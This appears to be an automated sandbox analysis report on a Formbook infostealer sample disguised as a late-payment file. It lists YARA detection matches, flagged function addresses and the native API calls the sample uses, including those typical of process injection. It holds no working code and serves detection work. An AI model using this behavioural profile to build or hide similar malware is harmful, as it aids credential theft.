Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Uses 32bit PE files
Source: pago atrasado.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_004030FB
Detected potential crypto function
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_004047D3 0_2_004047D3
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_004061D4 0_2_004061D4
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_10008826 0_2_10008826
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_10003D10 0_2_10003D10
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_100110D1 0_2_100110D1
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1000F8F2 0_2_1000F8F2
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1001199C 0_2_1001199C
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_100059A1 0_2_100059A1
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1001A9E5 0_2_1001A9E5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1001A9F4 0_2_1001A9F4
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1000B22E 0_2_1000B22E
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1000FE64 0_2_1000FE64
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_10005E95 0_2_10005E95
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_100062AD 0_2_100062AD
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_100066E2 0_2_100066E2
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_10006B17 0_2_10006B17
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1000F380 0_2_1000F380
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00401030 1_2_00401030
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041D0F5 1_2_0041D0F5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041C0FC 1_2_0041C0FC
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041B8B6 1_2_0041B8B6
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041C985 1_2_0041C985
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041C3AF 1_2_0041C3AF
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00408C6B 1_2_00408C6B
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00408C70 1_2_00408C70
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041BD45 1_2_0041BD45
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00402D90 1_2_00402D90
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041A6B6 1_2_0041A6B6
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00402FB0 1_2_00402FB0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A920A8 1_2_00A920A8
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009DB090 1_2_009DB090
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F20A0 1_2_009F20A0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A928EC 1_2_00A928EC
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81002 1_2_00A81002
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CF900 1_2_009CF900
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E4120 1_2_009E4120
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A922AE 1_2_00A922AE
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FEBB0 1_2_009FEBB0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8DBD2 1_2_00A8DBD2
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A92B28 1_2_00A92B28
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D841F 1_2_009D841F
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8D466 1_2_00A8D466
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F2581 1_2_009F2581
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A925DD 1_2_00A925DD
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009DD5E0 1_2_009DD5E0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A92D07 1_2_00A92D07
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C0D20 1_2_009C0D20
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A91D55 1_2_00A91D55
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A92EF7 1_2_00A92EF7
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E6E30 1_2_009E6E30
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8D616 1_2_00A8D616
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A91FF1 1_2_00A91FF1
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_00401030 1_1_00401030
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_0041D0F5 1_1_0041D0F5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_0041C0FC 1_1_0041C0FC
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_0041B8B6 1_1_0041B8B6
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_0041C985 1_1_0041C985
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454841F 16_2_0454841F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045F1002 16_2_045F1002
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454B090 16_2_0454B090
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045620A0 16_2_045620A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04601D55 16_2_04601D55
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453F900 16_2_0453F900
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04530D20 16_2_04530D20
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04554120 16_2_04554120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454D5E0 16_2_0454D5E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04562581 16_2_04562581
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04556E30 16_2_04556E30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456EBB0 16_2_0456EBB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1B8B6 16_2_02B1B8B6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1D0F5 16_2_02B1D0F5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1C985 16_2_02B1C985
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1A6B6 16_2_02B1A6B6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B02FB0 16_2_02B02FB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B08C70 16_2_02B08C70
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B08C6B 16_2_02B08C6B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B02D90 16_2_02B02D90
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1BD45 16_2_02B1BD45
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 0453B150 appears 32 times
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: String function: 009CB150 appears 35 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_004185D0 NtCreateFile, 1_2_004185D0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00418680 NtReadFile, 1_2_00418680
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00418700 NtClose, 1_2_00418700
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_004187B0 NtAllocateVirtualMemory, 1_2_004187B0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_004185CA NtCreateFile, 1_2_004185CA
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041867A NtReadFile, 1_2_0041867A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_004186FB NtClose, 1_2_004186FB
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A098F0 NtReadVirtualMemory,LdrInitializeThunk, 1_2_00A098F0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09860 NtQuerySystemInformation,LdrInitializeThunk, 1_2_00A09860
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09840 NtDelayExecution,LdrInitializeThunk, 1_2_00A09840
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A099A0 NtCreateSection,LdrInitializeThunk, 1_2_00A099A0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09910 NtAdjustPrivilegesToken,LdrInitializeThunk, 1_2_00A09910
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09A20 NtResumeThread,LdrInitializeThunk, 1_2_00A09A20
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09A00 NtProtectVirtualMemory,LdrInitializeThunk, 1_2_00A09A00
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09A50 NtCreateFile,LdrInitializeThunk, 1_2_00A09A50
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A095D0 NtClose,LdrInitializeThunk, 1_2_00A095D0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09540 NtReadFile,LdrInitializeThunk, 1_2_00A09540
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A096E0 NtFreeVirtualMemory,LdrInitializeThunk, 1_2_00A096E0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09660 NtAllocateVirtualMemory,LdrInitializeThunk, 1_2_00A09660
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A097A0 NtUnmapViewOfSection,LdrInitializeThunk, 1_2_00A097A0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09780 NtMapViewOfSection,LdrInitializeThunk, 1_2_00A09780
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09FE0 NtCreateMutant,LdrInitializeThunk, 1_2_00A09FE0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09710 NtQueryInformationToken,LdrInitializeThunk, 1_2_00A09710
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A098A0 NtWriteVirtualMemory, 1_2_00A098A0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09820 NtEnumerateKey, 1_2_00A09820
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A0B040 NtSuspendThread, 1_2_00A0B040
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A099D0 NtCreateProcessEx, 1_2_00A099D0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09950 NtQueueApcThread, 1_2_00A09950
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09A80 NtOpenDirectoryObject, 1_2_00A09A80
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09A10 NtQuerySection, 1_2_00A09A10
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A0A3B0 NtGetContextThread, 1_2_00A0A3B0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09B00 NtSetValueKey, 1_2_00A09B00
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A095F0 NtQueryInformationFile, 1_2_00A095F0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09520 NtWaitForSingleObject, 1_2_00A09520
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A0AD30 NtSetContextThread, 1_2_00A0AD30
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09560 NtWriteFile, 1_2_00A09560
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A096D0 NtCreateKey, 1_2_00A096D0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09610 NtEnumerateValueKey, 1_2_00A09610
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09670 NtQueryInformationProcess, 1_2_00A09670
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09650 NtQueryValueKey, 1_2_00A09650
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09730 NtQueryVirtualMemory, 1_2_00A09730
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A0A710 NtOpenProcessToken, 1_2_00A0A710
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09760 NtOpenProcess, 1_2_00A09760
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09770 NtSetInformationFile, 1_2_00A09770
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A0A770 NtOpenThread, 1_2_00A0A770
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_004185D0 NtCreateFile, 1_1_004185D0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_00418680 NtReadFile, 1_1_00418680
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_00418700 NtClose, 1_1_00418700
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_004187B0 NtAllocateVirtualMemory, 1_1_004187B0
